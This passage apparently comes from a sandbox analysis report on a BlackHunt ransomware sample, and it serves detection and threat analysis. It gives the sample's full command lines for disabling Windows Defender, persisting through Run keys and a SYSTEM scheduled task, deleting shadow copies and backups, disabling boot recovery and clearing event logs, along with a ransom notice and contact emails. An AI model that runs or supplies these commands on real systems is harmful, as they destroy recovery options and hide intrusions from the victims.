  Set value (int)  | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Processes (tree; [n] is the nesting level, indentation shows parent/child)
-
[1] C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe"
    - UAC bypass
    - Checks computer location settings
    - Checks whether UAC is enabled
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    - System policy modification
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f
        - Modifies registry class
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        - Modifies registry class
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f
        - Modifies registry class
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        - Modifies registry class
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
        - Adds Run key to start application
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        - Modifies Windows Defender Real-time Protection settings
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f
    [3] C:\Windows\system32\reg.exe
        cmd: REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f
        - Adds Run key to start application
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c SchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f
    [3] C:\Windows\system32\schtasks.exe
        cmd: SchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f
        - Creates scheduled task(s)
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    [3] C:\Windows\system32\vssadmin.exe
        cmd: vssadmin.exe Delete Shadows /all /quiet
        - Interacts with shadow copies
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    [3] C:\Windows\system32\bcdedit.exe
        cmd: bcdedit /set {default} recoveryenabled No
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    [3] C:\Windows\system32\bcdedit.exe
        cmd: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    [3] C:\Windows\system32\fsutil.exe
        cmd: fsutil.exe usn deletejournal /D C:
        - Deletes NTFS Change Journal
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    [3] C:\Windows\system32\wbadmin.exe
        cmd: wbadmin.exe delete catalog -quiet
        - Deletes backup catalog
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    [3] C:\Windows\system32\schtasks.exe
        cmd: schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
    [3] C:\Windows\system32\fsutil.exe
        cmd: fsutil usn deletejournal /D C:\
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
    [3] C:\Windows\system32\fsutil.exe
        cmd: fsutil usn deletejournal /D M:\
        - Enumerates connected drives
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
    [3] C:\Windows\system32\wevtutil.exe
        cmd: wevtutil.exe cl Setup
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
    [3] C:\Windows\system32\wevtutil.exe
        cmd: wevtutil.exe cl System
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
    [3] C:\Windows\system32\wevtutil.exe
        cmd: wevtutil.exe cl Application
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
    [3] C:\Windows\system32\wevtutil.exe
        cmd: wevtutil.exe cl Security
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
    [3] C:\Windows\system32\wevtutil.exe
        cmd: wevtutil.exe cl Security /e:false
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    [3] C:\Windows\system32\vssadmin.exe
        cmd: vssadmin.exe Delete Shadows /all /quiet
        - Interacts with shadow copies
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    [3] C:\Windows\system32\bcdedit.exe
        cmd: bcdedit /set {default} recoveryenabled No
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    [3] C:\Windows\system32\bcdedit.exe
        cmd: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        - Modifies boot configuration data using bcdedit
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    [3] C:\Windows\system32\fsutil.exe
        cmd: fsutil.exe usn deletejournal /D C:
        - Deletes NTFS Change Journal
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    [3] C:\Windows\system32\wbadmin.exe
        cmd: wbadmin.exe delete catalog -quiet
        - Deletes backup catalog
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
    [3] C:\Windows\system32\reg.exe
        cmd: REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [amike1096@gmail.com] AND [onion746@onionmail.com] " /f
    [3] C:\Windows\system32\reg.exe
        cmd: REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [amike1096@gmail.com] AND [onion746@onionmail.com] " /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    [3] C:\Windows\system32\schtasks.exe
        cmd: schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c REG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f
    [3] C:\Windows\system32\reg.exe
        cmd: REG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
    [3] C:\Windows\system32\taskkill.exe
        cmd: taskkill /IM mshta.exe /f
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
    [3] C:\Windows\system32\notepad.exe
        cmd: notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
  [2] C:\Windows\System32\cmd.exe
      cmd: "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
      - Checks computer location settings
      - Modifies registry class
    [3] C:\Windows\SysWOW64\mshta.exe
        cmd: "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  [2] C:\Windows\SysWOW64\cmd.exe
      cmd: C:\Windows\system32\cmd.exe /c start /min cmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
[1] C:\Windows\system32\vssvc.exe
    cmd: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\wbengine.exe
    cmd: "C:\Windows\system32\wbengine.exe"
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\vdsldr.exe
    cmd: C:\Windows\System32\vdsldr.exe -Embedding
[1] C:\Windows\System32\vds.exe
    cmd: C:\Windows\System32\vds.exe
    - Checks SCSI registry key(s)
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (5)
- Disabling Security Tools (2)
- Bypass User Account Control (1)
- Indicator Removal on Host (1)
- File Deletion (3)
Downloads
-
C:\ProgramData\#BlackHunt_ReadMe.hta
Filesize: 10KB
MD5: c4e9dc244ac49843a08da3e6609c775f
SHA1: 189866d7e0e5422abddf454ee31b53bef64c558f
SHA256: 16c664e9f9d0d8cbb60ed020016054492b4549183dc2028382c3faf47cf627e8
SHA512: 6c396c98254eda5b20e6e32034f9875f5cfe87a7ab8d76a65a20a2a18594a38d647fced8fec8e9457f1ee44ece7062af4bb461481d6b4f6718b2783aecda4fe2
-
C:\ProgramData\#BlackHunt_ReadMe.txt
Filesize: 687B
MD5: 3409cb1796ae3e9bd975c8303469b955
SHA1: 3a126e1f3b7c4dc37676e1a2a8131ddd880591f4
SHA256: 5d081e33612f4ddb324934bd369d77d2fd7a749a2a568f406917d55c3e6459b5
SHA512: 69fafc727e0208e2494fe872eab0107746c1c9ecbec4e2709bca11b5f65547ac043095781c0105c6a6f8de0073d326c43d9ee1bf6480ef93033c76e77826cafc